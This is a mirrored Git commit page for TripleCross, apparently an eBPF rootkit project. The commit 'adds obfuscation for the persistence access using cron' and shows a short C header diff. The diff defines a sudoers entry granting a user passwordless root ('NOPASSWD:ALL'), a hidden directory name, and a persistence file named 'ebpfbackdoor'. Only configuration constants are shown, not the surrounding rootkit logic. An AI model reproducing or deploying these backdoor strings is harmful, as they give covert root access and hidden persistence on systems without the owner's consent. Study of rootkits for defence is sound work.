mirror of
https://github.com/h3xduck/TripleCross.git
synced 2025-12-24 18:33:08 +08:00
Added obfuscation for the persistance access using cron
This commit is contained in:
@@ -18,7 +18,8 @@
|
||||
#define STRING_FS_SUDOERS_ENTRY "osboxes ALL=(ALL:ALL) NOPASSWD:ALL #"
|
||||
#define STRING_FS_SUDOERS_ENTRY_LEN 37
|
||||
|
||||
#define STRING_SECRET_DIRECTORY_NAME_HIDE "SECRETDIR"
|
||||
#define SECRET_DIRECTORY_NAME_HIDE "SECRETDIR"
|
||||
#define SECRET_FILE_PERSISTENCE_NAME "ebpfbackdoor"
|
||||
|
||||
//EXECUTION HIJACKING
|
||||
|
||||
|
||||
Reference in New Issue
Block a user